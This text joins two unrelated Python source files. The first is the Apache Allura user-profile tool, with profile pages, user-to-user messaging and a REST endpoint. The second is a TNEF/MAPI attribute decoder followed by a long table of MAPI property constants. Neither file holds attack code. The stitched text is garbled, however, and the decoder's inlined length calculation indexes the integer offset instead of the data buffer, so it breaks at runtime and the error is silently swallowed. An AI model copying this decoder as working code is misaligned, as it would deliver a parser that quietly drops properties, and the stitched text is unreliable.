# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import pkg_resources
from datetime import datetime
import six
from formencode import validators
from tg import request
from tg import tmpl_context as c, app_globals as g
from pytz import timezone
from tg import expose, redirect, validate, flash
from tg.decorators import without_trailing_slash
from decorator import decorator
from webob import exc
from allura import version
from allura.app import Application, SitemapEntry
from allura.controllers import BaseController
from allura.controllers.feed import FeedArgs, FeedController
from allura.controllers.rest import AppRestControllerMixin
from allura.lib import helpers as h
from allura.lib.decorators import require_post
from allura.lib.plugin import AuthenticationProvider
from allura.lib.security import require_access
from allura.lib.widgets.user_profile import SendMessageForm, SectionsUtil, SectionBase, ProjectsSectionBase
from allura.model import User, ACE, ProjectRole
log = logging.getLogger(__name__)
class F:
send_message = SendMessageForm()
class UserProfileApp(Application):
"""
This is the Profile tool, which is automatically installed as
the default (first) tool on any user project.
"""
__version__ = version.__version__
tool_label = 'Profile'
max_instances = 0
has_notifications = False
icons = {
24: 'images/home_24.png',
32: 'images/home_32.png',
48: 'images/home_48.png'
}
def __init__(self, user, config):
Application.__init__(self, user, config)
self.root = UserProfileController()
self.templates = pkg_resources.resource_filename(
'allura.ext.user_profile', 'templates')
self.api_root = UserProfileRestController()
@property
@h.exceptionless([], log)
def sitemap(self):
return [SitemapEntry('Profile', '.')]
def admin_menu(self):
return []
def main_menu(self):
return [SitemapEntry('Profile', '.')]
def is_visible_to(self, user):
# we don't work with user subprojects
return c.project.is_root
def install(self, project):
pr = ProjectRole.by_user(c.user)
if pr:
self.config.acl = [
ACE.allow(pr._id, perm)
for perm in self.permissions]
def uninstall(self, project): # pragma no cover
pass
@property
def profile_sections(self):
"""
Loads and caches user profile sections from the entry-point
group ``[allura.user_profile.sections]``.
Profile sections are loaded unless disabled (see
`allura.lib.helpers.iter_entry_points`) and are sorted according
to the `user_profile_sections.order` config value.
The config should contain a comma-separated list of entry point names
in the order that they should appear in the profile. Unknown or
disabled sections are ignored, and available sections that are not
specified in the order come after all explicitly ordered sections,
sorted randomly.
"""
if hasattr(UserProfileApp, '_sections'):
return UserProfileApp._sections
UserProfileApp._sections = SectionsUtil.load_sections('user_profile')
return UserProfileApp._sections
class UserProfileController(BaseController, FeedController):
def _check_security(self):
require_access(c.project, 'read')
def _check_can_message(self, from_user, to_user):
if from_user.is_anonymous():
flash('You must be logged in to send user messages.', 'info')
redirect(six.ensure_text(request.referer or '/'))
if not (from_user and from_user.get_pref('email_address')):
flash('In order to send messages, you must have an email address '
'associated with your account.', 'info')
redirect(six.ensure_text(request.referer or '/'))
if not (to_user and to_user.get_pref('email_address')):
flash('This user can not receive messages because they do not have '
'an email address associated with their account.', 'info')
redirect(six.ensure_text(request.referer or '/'))
if to_user.get_pref('disable_user_messages'):
flash('This user has disabled direct email messages', 'info')
redirect(six.ensure_text(request.referer or '/'))
@expose('jinja:allura.ext.user_profile:templates/user_index.html')
def index(self, **kw):
"""
https://sf-11.xb.sf.net/u/admin1
"""
user = c.project.user_project_of
if not user:
raise exc.HTTPNotFound()
provider = AuthenticationProvider.get(request)
sections = [section(user, c.project)
for section in c.app.profile_sections]
noindex = True
for s in sections:
s.setup_context()
if s.context.get('projects') or s.context.get('timeline'):
noindex = False
return dict(
user=user,
reg_date=provider.user_registration_date(user),
sections=sections,
noindex=noindex,
)
def get_feed(self, project, app, user):
"""Return a :class:`allura.controllers.feed.FeedArgs` object describing
the xml feed for this controller.
Overrides :meth:`allura.controllers.feed.FeedController.get_feed`.
"""
user = project.user_project_of
return FeedArgs(
{'author_link': user.url()},
'Recent posts by %s' % user.display_name,
project.url())
@expose('jinja:allura.ext.user_profile:templates/send_message.html')
def send_message(self):
"""Render form for sending a message to another user.
"""
self._check_can_message(c.user, c.project.user_project_of)
delay = c.user.time_to_next_user_message()
expire_time = str(delay) if delay else None
c.form = F.send_message
if c.user.get_pref('message_reply_real_address'):
c.form.fields.reply_to_real_address.attrs = {'checked': 'checked'}
return dict(user=c.project.user_project_of, expire_time=expire_time)
@require_post()
@expose()
@validate(dict(subject=validators.NotEmpty,
message=validators.NotEmpty))
def send_user_message(self, subject='', message='', cc=None, reply_to_real_address=None):
"""Handle POST for sending a message to another user.
"""
self._check_can_message(c.user, c.project.user_project_of)
if cc:
cc = c.user.get_pref('email_address')
if c.user.can_send_user_message():
if reply_to_real_address:
c.user.set_pref('message_reply_real_address', True)
else:
c.user.set_pref('message_reply_real_address', False)
c.user.send_user_message(
c.project.user_project_of, subject, message, cc, reply_to_real_address, c.user.preferences.email_address)
flash("Message sent.")
else:
flash("You can't send more than %i messages per %i seconds" % (
g.user_message_max_messages,
g.user_message_time_interval), 'error')
return redirect(c.project.user_project_of.url())
@without_trailing_slash
@expose('jinja:allura.ext.user_profile:templates/user_card.html')
def user_card(self):
u = c.project.user_project_of
locationData = u.get_pref('localization')
webpages = u.get_pref('webpages')
location = ''
website = ''
if locationData.city and locationData.country:
location = locationData.city + ', ' + locationData.country
elif locationData.country and not locationData.city:
location = locationData.country
elif locationData.city and not locationData.country:
location = locationData.city
if len(webpages) > 0:
website = webpages[0]
return dict(
user=u,
location=location,
website=website)
class UserProfileRestController(AppRestControllerMixin):
@expose('json:')
def index(self, **kw):
user = c.project.user_project_of
if not user:
raise exc.HTTPNotFound()
sections = [section(user, c.project)
for section in c.app.profile_sections]
json = {}
for s in sections:
if hasattr(s, '__json__'):
json.update(s.__json__())
return json
class ProfileSectionBase(SectionBase):
"""
This is the base class for sections on the Profile tool.
.. py:attribute:: template
A resource string pointing to the template for this section. E.g.::
template = "allura.ext.user_profile:templates/projects.html"
Sections must be pointed to by an entry-point in the group
``[allura.user_profile.sections]``.
"""
def __init__(self, user, project):
"""
Creates a section for the given :param:`user` and user
:param:`project`. Stores the values as attributes of
the same name.
"""
super().__init__(user)
self.project = project
class PersonalDataSection(ProfileSectionBase):
template = 'allura.ext.user_profile:templates/sections/personal-data.html'
def prepare_context(self, context):
context['timezone'] = self.user.get_pref('timezone')
if context['timezone']:
tz = timezone(context['timezone'])
context['timezone'] = tz.tzname(datetime.utcnow())
return context
def __json__(self):
auth_provider = AuthenticationProvider.get(request)
return dict(
username=self.user.username,
name=self.user.display_name,
joined=auth_provider.user_registration_date(self.user),
localization=self.user.get_pref('localization')._deinstrument(),
sex=self.user.get_pref('sex'),
telnumbers=self.user.get_pref('telnumbers')._deinstrument(),
skypeaccount=self.user.get_pref('skypeaccount'),
webpages=self.user.get_pref('webpages')._deinstrument(),
availability=self.user.get_pref('availability')._deinstrument())
class ProjectsSection(ProfileSectionBase, ProjectsSectionBase):
template = 'allura.ext.user_profile:templates/sections/projects.html'
class SkillsSection(ProfileSectionBase):
template = 'allura.ext.user_profile:templates/sections/skills.html'
def __json__(self):
return dict(skills=self.user.get_skills())
class ToolsSection(ProfileSectionBase):
template = 'allura.ext.user_profile:templates/sections/tools.html'
class SocialSection(ProfileSectionBase):
template = 'allura.ext.user_profile:templates/sections/social.html'
def __json__(self):
return dict(
socialnetworks=self.user.get_pref('socialnetworks')._deinstrument())
|
|
"MAPI attribute definitions"
import logging
from util import bytes_to_int
logging.basicConfig()
logger = logging.getLogger("mapi-decode")
SZMAPI_UNSPECIFIED = 0x0000 # MAPI Unspecified
SZMAPI_NULL = 0x0001 # MAPI null property
SZMAPI_SHORT = 0x0002 # MAPI short (signed 16 bits)
SZMAPI_INT = 0x0003 # MAPI integer (signed 32 bits)
SZMAPI_FLOAT = 0x0004 # MAPI float (4 bytes)
SZMAPI_DOUBLE = 0x0005 # MAPI double
SZMAPI_CURRENCY = 0x0006 # MAPI currency (64 bits)
SZMAPI_APPTIME = 0x0007 # MAPI application time
SZMAPI_ERROR = 0x000a # MAPI error (32 bits)
SZMAPI_BOOLEAN = 0x000b # MAPI boolean (16 bits)
SZMAPI_OBJECT = 0x000d # MAPI embedded object
SZMAPI_INT8BYTE = 0x0014 # MAPI 8 byte signed int
SZMAPI_STRING = 0x001e # MAPI string
SZMAPI_UNICODE_STRING = 0x001f # MAPI unicode-string (null terminated)
#SZMAPI_PT_SYSTIME = 0x001e # MAPI time (after 2038/01/17 22:14:07 or before 1970/01/01 00:00:00)
SZMAPI_SYSTIME = 0x0040 # MAPI time (64 bits)
SZMAPI_CLSID = 0x0048 # MAPI OLE GUID
SZMAPI_BINARY = 0x0102 # MAPI binary
SZMAPI_BEATS_THE_HELL_OUTTA_ME = 0x0033
def decode_mapi(data):
"decode MAPI types"
dataLen = len(data)
attrs = []
offset = 0
num_properties = bytes_to_int(data[offset:offset+4]); offset += 4
# logger.debug("%i MAPI properties" % num_properties)
try:
for i in range(num_properties):
if offset >= dataLen:
logger.warn("Skipping property '%i'" % i)
continue
attr_type = bytes_to_int(data[offset:offset+2]); offset += 2
attr_name = bytes_to_int(data[offset:offset+2]); offset += 2
# logger.debug("Attribute type: 0x%4.4x" % attr_type)
# logger.debug("Attribute name: 0x%4.4x" % attr_name)
guid = ''
if attr_name >= 0x8000:
guid = '%32.32x' % bytes_to_int(data[offset:offset+16]); offset += 16
kind = bytes_to_int(data[offset:offset+4]); offset += 4
# logger.debug("Kind: %8.8x" % kind)
if kind == 0:
# Skip the iid
offset += 4
else:
iidLen = bytes_to_int(data[offset:offset+4]); offset += 4
q,r = divmod(iidLen, 4)
if r != 0:
iidLen += (4-r)
offset += iidLen
attr_data = None
if attr_type == SZMAPI_SHORT:
attr_data = data[offset:offset+2]; offset += 2
elif attr_type in (SZMAPI_INT, SZMAPI_FLOAT, SZMAPI_ERROR, SZMAPI_BOOLEAN):
attr_data = data[offset:offset+4]; offset += 4
elif attr_type in (SZMAPI_DOUBLE, SZMAPI_APPTIME, SZMAPI_CURRENCY, SZMAPI_INT8BYTE, SZMAPI_SYSTIME):
attr_data = data[offset:offset+8]; offset += 8
elif attr_type == SZMAPI_CLSID:
attr_data = data[offset:offset+16]; offset += 16
elif attr_type in (SZMAPI_STRING, SZMAPI_UNICODE_STRING, SZMAPI_OBJECT, SZMAPI_BINARY, SZMAPI_UNSPECIFIED):
num_vals = bytes_to_int(data[offset:offset+4]); offset += 4
# logger.debug("Number of values: %i" % num_vals)
attr_data = []
for j in range(num_vals):
# inlined version of bytes_to_int, for performance:
length = ord(offset[0]) + (ord(offset[1]) << 8) + (ord(offset[2]) << 16) + (ord(offset[3]) << 24)
offset += 4
q,r = divmod(length, 4)
if r != 0:
length += (4-r)
# logger.debug("Length: %i" % length)
attr_data.append(data[offset:offset+length]); offset += length
else:
logger.debug("## Unknown MAPI type 0x%4.4x" % attr_type)
logger.debug("Attribute type: 0x%4.4x" % attr_type)
logger.debug("Attribute name: 0x%4.4x" % attr_name)
break
#logger.debug("Adding MAPI attribute %i to list" % (i+1))
attr = TNEFMAPI_Attribute(attr_type, attr_name, attr_data, guid)
attrs.append(attr)
except Exception as e:
# stack = traceback.format_exc()
logger.debug('decode_mapi Exception %s' % e)
# logger.debug(stack)
return attrs
class TNEFMAPI_Attribute(object):
"represents a mapi attribute"
MAPI_ACKNOWLEDGEMENT_MODE = 0x0001
MAPI_ALTERNATE_RECIPIENT_ALLOWED = 0x0002
MAPI_AUTHORIZING_USERS = 0x0003
MAPI_AUTO_FORWARD_COMMENT = 0x0004
MAPI_AUTO_FORWARDED = 0x0005
MAPI_CONTENT_CONFIDENTIALITY_ALGORITHM_ID = 0x0006
MAPI_CONTENT_CORRELATOR = 0x0007
MAPI_CONTENT_IDENTIFIER = 0x0008
MAPI_CONTENT_LENGTH = 0x0009
MAPI_CONTENT_RETURN_REQUESTED = 0x000A
MAPI_CONVERSATION_KEY = 0x000B
MAPI_CONVERSION_EITS = 0x000C
MAPI_CONVERSION_WITH_LOSS_PROHIBITED = 0x000D
MAPI_CONVERTED_EITS = 0x000E
MAPI_DEFERRED_DELIVERY_TIME = 0x000F
MAPI_DELIVER_TIME = 0x0010
MAPI_DISCARD_REASON = 0x0011
MAPI_DISCLOSURE_OF_RECIPIENTS = 0x0012
MAPI_DL_EXPANSION_HISTORY = 0x0013
MAPI_DL_EXPANSION_PROHIBITED = 0x0014
MAPI_EXPIRY_TIME = 0x0015
MAPI_IMPLICIT_CONVERSION_PROHIBITED = 0x0016
MAPI_IMPORTANCE = 0x0017
MAPI_IPM_ID = 0x0018
MAPI_LATEST_DELIVERY_TIME = 0x0019
MAPI_MESSAGE_CLASS = 0x001A
MAPI_MESSAGE_DELIVERY_ID = 0x001B
MAPI_MESSAGE_SECURITY_LABEL = 0x001E
MAPI_OBSOLETED_IPMS = 0x001F
MAPI_ORIGINALLY_INTENDED_RECIPIENT_NAME = 0x0020
MAPI_ORIGINAL_EITS = 0x0021
MAPI_ORIGINATOR_CERTIFICATE = 0x0022
MAPI_ORIGINATOR_DELIVERY_REPORT_REQUESTED = 0x0023
MAPI_ORIGINATOR_RETURN_ADDRESS = 0x0024
MAPI_PARENT_KEY = 0x0025
MAPI_PRIORITY = 0x0026
MAPI_ORIGIN_CHECK = 0x0027
MAPI_PROOF_OF_SUBMISSION_REQUESTED = 0x0028
MAPI_READ_RECEIPT_REQUESTED = 0x0029
MAPI_RECEIPT_TIME = 0x002A
MAPI_RECIPIENT_REASSIGNMENT_PROHIBITED = 0x002B
MAPI_REDIRECTION_HISTORY = 0x002C
MAPI_RELATED_IPMS = 0x002D
MAPI_ORIGINAL_SENSITIVITY = 0x002E
MAPI_LANGUAGES = 0x002F
MAPI_REPLY_TIME = 0x0030
MAPI_REPORT_TAG = 0x0031
MAPI_REPORT_TIME = 0x0032
MAPI_RETURNED_IPM = 0x0033
MAPI_SECURITY = 0x0034
MAPI_INCOMPLETE_COPY = 0x0035
MAPI_SENSITIVITY = 0x0036
MAPI_SUBJECT = 0x0037
MAPI_SUBJECT_IPM = 0x0038
MAPI_CLIENT_SUBMIT_TIME = 0x0039
MAPI_REPORT_NAME = 0x003A
MAPI_SENT_REPRESENTING_SEARCH_KEY = 0x003B
MAPI_X400_CONTENT_TYPE = 0x003C
MAPI_SUBJECT_PREFIX = 0x003D
MAPI_NON_RECEIPT_REASON = 0x003E
MAPI_RECEIVED_BY_ENTRYID = 0x003F
MAPI_RECEIVED_BY_NAME = 0x0040
MAPI_SENT_REPRESENTING_ENTRYID = 0x0041
MAPI_SENT_REPRESENTING_NAME = 0x0042
MAPI_RCVD_REPRESENTING_ENTRYID = 0x0043
MAPI_RCVD_REPRESENTING_NAME = 0x0044
MAPI_REPORT_ENTRYID = 0x0045
MAPI_READ_RECEIPT_ENTRYID = 0x0046
MAPI_MESSAGE_SUBMISSION_ID = 0x0047
MAPI_PROVIDER_SUBMIT_TIME = 0x0048
MAPI_ORIGINAL_SUBJECT = 0x0049
MAPI_DISC_VAL = 0x004A
MAPI_ORIG_MESSAGE_CLASS = 0x004B
MAPI_ORIGINAL_AUTHOR_ENTRYID = 0x004C
MAPI_ORIGINAL_AUTHOR_NAME = 0x004D
MAPI_ORIGINAL_SUBMIT_TIME = 0x004E
MAPI_REPLY_RECIPIENT_ENTRIES = 0x004F
MAPI_REPLY_RECIPIENT_NAMES = 0x0050
MAPI_RECEIVED_BY_SEARCH_KEY = 0x0051
MAPI_RCVD_REPRESENTING_SEARCH_KEY = 0x0052
MAPI_READ_RECEIPT_SEARCH_KEY = 0x0053
MAPI_REPORT_SEARCH_KEY = 0x0054
MAPI_ORIGINAL_DELIVERY_TIME = 0x0055
MAPI_ORIGINAL_AUTHOR_SEARCH_KEY = 0x0056
MAPI_MESSAGE_TO_ME = 0x0057
MAPI_MESSAGE_CC_ME = 0x0058
MAPI_MESSAGE_RECIP_ME = 0x0059
MAPI_ORIGINAL_SENDER_NAME = 0x005A
MAPI_ORIGINAL_SENDER_ENTRYID = 0x005B
MAPI_ORIGINAL_SENDER_SEARCH_KEY = 0x005C
MAPI_ORIGINAL_SENT_REPRESENTING_NAME = 0x005D
MAPI_ORIGINAL_SENT_REPRESENTING_ENTRYID = 0x005E
MAPI_ORIGINAL_SENT_REPRESENTING_SEARCH_KEY = 0x005F
MAPI_START_DATE = 0x0060
MAPI_END_DATE = 0x0061
MAPI_OWNER_APPT_ID = 0x0062
MAPI_RESPONSE_REQUESTED = 0x0063
MAPI_SENT_REPRESENTING_ADDRTYPE = 0x0064
MAPI_SENT_REPRESENTING_EMAIL_ADDRESS = 0x0065
MAPI_ORIGINAL_SENDER_ADDRTYPE = 0x0066
MAPI_ORIGINAL_SENDER_EMAIL_ADDRESS = 0x0067
MAPI_ORIGINAL_SENT_REPRESENTING_ADDRTYPE = 0x0068
MAPI_ORIGINAL_SENT_REPRESENTING_EMAIL_ADDRESS = 0x0069
MAPI_CONVERSATION_TOPIC = 0x0070
MAPI_CONVERSATION_INDEX = 0x0071
MAPI_ORIGINAL_DISPLAY_BCC = 0x0072
MAPI_ORIGINAL_DISPLAY_CC = 0x0073
MAPI_ORIGINAL_DISPLAY_TO = 0x0074
MAPI_RECEIVED_BY_ADDRTYPE = 0x0075
MAPI_RECEIVED_BY_EMAIL_ADDRESS = 0x0076
MAPI_RCVD_REPRESENTING_ADDRTYPE = 0x0077
MAPI_RCVD_REPRESENTING_EMAIL_ADDRESS = 0x0078
MAPI_ORIGINAL_AUTHOR_ADDRTYPE = 0x0079
MAPI_ORIGINAL_AUTHOR_EMAIL_ADDRESS = 0x007A
MAPI_ORIGINALLY_INTENDED_RECIP_ADDRTYPE = 0x007B
MAPI_ORIGINALLY_INTENDED_RECIP_EMAIL_ADDRESS = 0x007C
MAPI_TRANSPORT_MESSAGE_HEADERS = 0x007D
MAPI_DELEGATION = 0x007E
MAPI_TNEF_CORRELATION_KEY = 0x007F
MAPI_BODY = 0x1000
MAPI_BODY_HTML = 0x1013
MAPI_REPORT_TEXT = 0x1001
MAPI_ORIGINATOR_AND_DL_EXPANSION_HISTORY = 0x1002
MAPI_REPORTING_DL_NAME = 0x1003
MAPI_REPORTING_MTA_CERTIFICATE = 0x1004
MAPI_RTF_SYNC_BODY_CRC = 0x1006
MAPI_RTF_SYNC_BODY_COUNT = 0x1007
MAPI_RTF_SYNC_BODY_TAG = 0x1008
MAPI_RTF_COMPRESSED = 0x1009
MAPI_RTF_SYNC_PREFIX_COUNT = 0x1010
MAPI_RTF_SYNC_TRAILING_COUNT = 0x1011
MAPI_ORIGINALLY_INTENDED_RECIP_ENTRYID = 0x1012
MAPI_CONTENT_INTEGRITY_CHECK = 0x0C00
MAPI_EXPLICIT_CONVERSION = 0x0C01
MAPI_IPM_RETURN_REQUESTED = 0x0C02
MAPI_MESSAGE_TOKEN = 0x0C03
MAPI_NDR_REASON_CODE = 0x0C04
MAPI_NDR_DIAG_CODE = 0x0C05
MAPI_NON_RECEIPT_NOTIFICATION_REQUESTED = 0x0C06
MAPI_DELIVERY_POINT = 0x0C07
MAPI_ORIGINATOR_NON_DELIVERY_REPORT_REQUESTED = 0x0C08
MAPI_ORIGINATOR_REQUESTED_ALTERNATE_RECIPIENT = 0x0C09
MAPI_PHYSICAL_DELIVERY_BUREAU_FAX_DELIVERY = 0x0C0A
MAPI_PHYSICAL_DELIVERY_MODE = 0x0C0B
MAPI_PHYSICAL_DELIVERY_REPORT_REQUEST = 0x0C0C
MAPI_PHYSICAL_FORWARDING_ADDRESS = 0x0C0D
MAPI_PHYSICAL_FORWARDING_ADDRESS_REQUESTED = 0x0C0E
MAPI_PHYSICAL_FORWARDING_PROHIBITED = 0x0C0F
MAPI_PHYSICAL_RENDITION_ATTRIBUTES = 0x0C10
MAPI_PROOF_OF_DELIVERY = 0x0C11
MAPI_PROOF_OF_DELIVERY_REQUESTED = 0x0C12
MAPI_RECIPIENT_CERTIFICATE = 0x0C13
MAPI_RECIPIENT_NUMBER_FOR_ADVICE = 0x0C14
MAPI_RECIPIENT_TYPE = 0x0C15
MAPI_REGISTERED_MAIL_TYPE = 0x0C16
MAPI_REPLY_REQUESTED = 0x0C17
MAPI_REQUESTED_DELIVERY_METHOD = 0x0C18
MAPI_SENDER_ENTRYID = 0x0C19
MAPI_SENDER_NAME = 0x0C1A
MAPI_SUPPLEMENTARY_INFO = 0x0C1B
MAPI_TYPE_OF_MTS_USER = 0x0C1C
MAPI_SENDER_SEARCH_KEY = 0x0C1D
MAPI_SENDER_ADDRTYPE = 0x0C1E
MAPI_SENDER_EMAIL_ADDRESS = 0x0C1F
MAPI_CURRENT_VERSION = 0x0E00
MAPI_DELETE_AFTER_SUBMIT = 0x0E01
MAPI_DISPLAY_BCC = 0x0E02
MAPI_DISPLAY_CC = 0x0E03
MAPI_DISPLAY_TO = 0x0E04
MAPI_PARENT_DISPLAY = 0x0E05
MAPI_MESSAGE_DELIVERY_TIME = 0x0E06
MAPI_MESSAGE_FLAGS = 0x0E07
MAPI_MESSAGE_SIZE = 0x0E08
MAPI_PARENT_ENTRYID = 0x0E09
MAPI_SENTMAIL_ENTRYID = 0x0E0A
MAPI_CORRELATE = 0x0E0C
MAPI_CORRELATE_MTSID = 0x0E0D
MAPI_DISCRETE_VALUES = 0x0E0E
MAPI_RESPONSIBILITY = 0x0E0F
MAPI_SPOOLER_STATUS = 0x0E10
MAPI_TRANSPORT_STATUS = 0x0E11
MAPI_MESSAGE_RECIPIENTS = 0x0E12
MAPI_MESSAGE_ATTACHMENTS = 0x0E13
MAPI_SUBMIT_FLAGS = 0x0E14
MAPI_RECIPIENT_STATUS = 0x0E15
MAPI_TRANSPORT_KEY = 0x0E16
MAPI_MSG_STATUS = 0x0E17
MAPI_MESSAGE_DOWNLOAD_TIME = 0x0E18
MAPI_CREATION_VERSION = 0x0E19
MAPI_MODIFY_VERSION = 0x0E1A
MAPI_HASATTACH = 0x0E1B
MAPI_BODY_CRC = 0x0E1C
MAPI_NORMALIZED_SUBJECT = 0x0E1D
MAPI_RTF_IN_SYNC = 0x0E1F
MAPI_ATTACH_SIZE = 0x0E20
MAPI_ATTACH_NUM = 0x0E21
MAPI_PREPROCESS = 0x0E22
MAPI_ORIGINATING_MTA_CERTIFICATE = 0x0E25
MAPI_PROOF_OF_SUBMISSION = 0x0E26
MAPI_ENTRYID = 0x0FFF
MAPI_OBJECT_TYPE = 0x0FFE
MAPI_ICON = 0x0FFD
MAPI_MINI_ICON = 0x0FFC
MAPI_STORE_ENTRYID = 0x0FFB
MAPI_STORE_RECORD_KEY = 0x0FFA
MAPI_RECORD_KEY = 0x0FF9
MAPI_MAPPING_SIGNATURE = 0x0FF8
MAPI_ACCESS_LEVEL = 0x0FF7
MAPI_INSTANCE_KEY = 0x0FF6
MAPI_ROW_TYPE = 0x0FF5
MAPI_ACCESS = 0x0FF4
MAPI_ROWID = 0x3000
MAPI_DISPLAY_NAME = 0x3001
MAPI_ADDRTYPE = 0x3002
MAPI_EMAIL_ADDRESS = 0x3003
MAPI_COMMENT = 0x3004
MAPI_DEPTH = 0x3005
MAPI_PROVIDER_DISPLAY = 0x3006
MAPI_CREATION_TIME = 0x3007
MAPI_LAST_MODIFICATION_TIME = 0x3008
MAPI_RESOURCE_FLAGS = 0x3009
MAPI_PROVIDER_DLL_NAME = 0x300A
MAPI_SEARCH_KEY = 0x300B
MAPI_PROVIDER_UID = 0x300C
MAPI_PROVIDER_ORDINAL = 0x300D
MAPI_FORM_VERSION = 0x3301
MAPI_FORM_CLSID = 0x3302
MAPI_FORM_CONTACT_NAME = 0x3303
MAPI_FORM_CATEGORY = 0x3304
MAPI_FORM_CATEGORY_SUB = 0x3305
MAPI_FORM_HOST_MAP = 0x3306
MAPI_FORM_HIDDEN = 0x3307
MAPI_FORM_DESIGNER_NAME = 0x3308
MAPI_FORM_DESIGNER_GUID = 0x3309
MAPI_FORM_MESSAGE_BEHAVIOR = 0x330A
MAPI_DEFAULT_STORE = 0x3400
MAPI_STORE_SUPPORT_MASK = 0x340D
MAPI_STORE_STATE = 0x340E
MAPI_IPM_SUBTREE_SEARCH_KEY = 0x3410
MAPI_IPM_OUTBOX_SEARCH_KEY = 0x3411
MAPI_IPM_WASTEBASKET_SEARCH_KEY = 0x3412
MAPI_IPM_SENTMAIL_SEARCH_KEY = 0x3413
MAPI_MDB_PROVIDER = 0x3414
MAPI_RECEIVE_FOLDER_SETTINGS = 0x3415
MAPI_VALID_FOLDER_MASK = 0x35DF
MAPI_IPM_SUBTREE_ENTRYID = 0x35E0
MAPI_IPM_OUTBOX_ENTRYID = 0x35E2
MAPI_IPM_WASTEBASKET_ENTRYID = 0x35E3
MAPI_IPM_SENTMAIL_ENTRYID = 0x35E4
MAPI_VIEWS_ENTRYID = 0x35E5
MAPI_COMMON_VIEWS_ENTRYID = 0x35E6
MAPI_FINDER_ENTRYID = 0x35E7
MAPI_CONTAINER_FLAGS = 0x3600
MAPI_FOLDER_TYPE = 0x3601
MAPI_CONTENT_COUNT = 0x3602
MAPI_CONTENT_UNREAD = 0x3603
MAPI_CREATE_TEMPLATES = 0x3604
MAPI_DETAILS_TABLE = 0x3605
MAPI_SEARCH = 0x3607
MAPI_SELECTABLE = 0x3609
MAPI_SUBFOLDERS = 0x360A
MAPI_STATUS = 0x360B
MAPI_ANR = 0x360C
MAPI_CONTENTS_SORT_ORDER = 0x360D
MAPI_CONTAINER_HIERARCHY = 0x360E
MAPI_CONTAINER_CONTENTS = 0x360F
MAPI_FOLDER_ASSOCIATED_CONTENTS = 0x3610
MAPI_DEF_CREATE_DL = 0x3611
MAPI_DEF_CREATE_MAILUSER = 0x3612
MAPI_CONTAINER_CLASS = 0x3613
MAPI_CONTAINER_MODIFY_VERSION = 0x3614
MAPI_AB_PROVIDER_ID = 0x3615
MAPI_DEFAULT_VIEW_ENTRYID = 0x3616
MAPI_ASSOC_CONTENT_COUNT = 0x3617
MAPI_ATTACHMENT_X400_PARAMETERS = 0x3700
MAPI_ATTACH_DATA_OBJ = 0x3701
MAPI_ATTACH_ENCODING = 0x3702
MAPI_ATTACH_EXTENSION = 0x3703
MAPI_ATTACH_FILENAME = 0x3704
MAPI_ATTACH_METHOD = 0x3705
MAPI_ATTACH_LONG_FILENAME = 0x3707
MAPI_ATTACH_PATHNAME = 0x3708
MAPI_ATTACH_RENDERING = 0x3709
MAPI_ATTACH_TAG = 0x370A
MAPI_RENDERING_POSITION = 0x370B
MAPI_ATTACH_TRANSPORT_NAME = 0x370C
MAPI_ATTACH_LONG_PATHNAME = 0x370D
MAPI_ATTACH_MIME_TAG = 0x370E
MAPI_ATTACH_ADDITIONAL_INFO = 0x370F
MAPI_DISPLAY_TYPE = 0x3900
MAPI_TEMPLATEID = 0x3902
MAPI_PRIMARY_CAPABILITY = 0x3904
MAPI_7BIT_DISPLAY_NAME = 0x39FF
MAPI_ACCOUNT = 0x3A00
MAPI_ALTERNATE_RECIPIENT = 0x3A01
MAPI_CALLBACK_TELEPHONE_NUMBER = 0x3A02
MAPI_CONVERSION_PROHIBITED = 0x3A03
MAPI_DISCLOSE_RECIPIENTS = 0x3A04
MAPI_GENERATION = 0x3A05
MAPI_GIVEN_NAME = 0x3A06
MAPI_GOVERNMENT_ID_NUMBER = 0x3A07
MAPI_BUSINESS_TELEPHONE_NUMBER = 0x3A08
MAPI_HOME_TELEPHONE_NUMBER = 0x3A09
MAPI_INITIALS = 0x3A0A
MAPI_KEYWORD = 0x3A0B
MAPI_LANGUAGE = 0x3A0C
MAPI_LOCATION = 0x3A0D
MAPI_MAIL_PERMISSION = 0x3A0E
MAPI_MHS_COMMON_NAME = 0x3A0F
MAPI_ORGANIZATIONAL_ID_NUMBER = 0x3A10
MAPI_SURNAME = 0x3A11
MAPI_ORIGINAL_ENTRYID = 0x3A12
MAPI_ORIGINAL_DISPLAY_NAME = 0x3A13
MAPI_ORIGINAL_SEARCH_KEY = 0x3A14
MAPI_POSTAL_ADDRESS = 0x3A15
MAPI_COMPANY_NAME = 0x3A16
MAPI_TITLE = 0x3A17
MAPI_DEPARTMENT_NAME = 0x3A18
MAPI_OFFICE_LOCATION = 0x3A19
MAPI_PRIMARY_TELEPHONE_NUMBER = 0x3A1A
MAPI_BUSINESS2_TELEPHONE_NUMBER = 0x3A1B
MAPI_MOBILE_TELEPHONE_NUMBER = 0x3A1C
MAPI_RADIO_TELEPHONE_NUMBER = 0x3A1D
MAPI_CAR_TELEPHONE_NUMBER = 0x3A1E
MAPI_OTHER_TELEPHONE_NUMBER = 0x3A1F
MAPI_TRANSMITABLE_DISPLAY_NAME = 0x3A20
MAPI_PAGER_TELEPHONE_NUMBER = 0x3A21
MAPI_USER_CERTIFICATE = 0x3A22
MAPI_PRIMARY_FAX_NUMBER = 0x3A23
MAPI_BUSINESS_FAX_NUMBER = 0x3A24
MAPI_HOME_FAX_NUMBER = 0x3A25
MAPI_COUNTRY = 0x3A26
MAPI_LOCALITY = 0x3A27
MAPI_STATE_OR_PROVINCE = 0x3A28
MAPI_STREET_ADDRESS = 0x3A29
MAPI_POSTAL_CODE = 0x3A2A
MAPI_POST_OFFICE_BOX = 0x3A2B
MAPI_TELEX_NUMBER = 0x3A2C
MAPI_ISDN_NUMBER = 0x3A2D
MAPI_ASSISTANT_TELEPHONE_NUMBER = 0x3A2E
MAPI_HOME2_TELEPHONE_NUMBER = 0x3A2F
MAPI_ASSISTANT = 0x3A30
MAPI_SEND_RICH_INFO = 0x3A40
MAPI_WEDDING_ANNIVERSARY = 0x3A41
MAPI_BIRTHDAY = 0x3A42
MAPI_HOBBIES = 0x3A43
MAPI_MIDDLE_NAME = 0x3A44
MAPI_DISPLAY_NAME_PREFIX = 0x3A45
MAPI_PROFESSION = 0x3A46
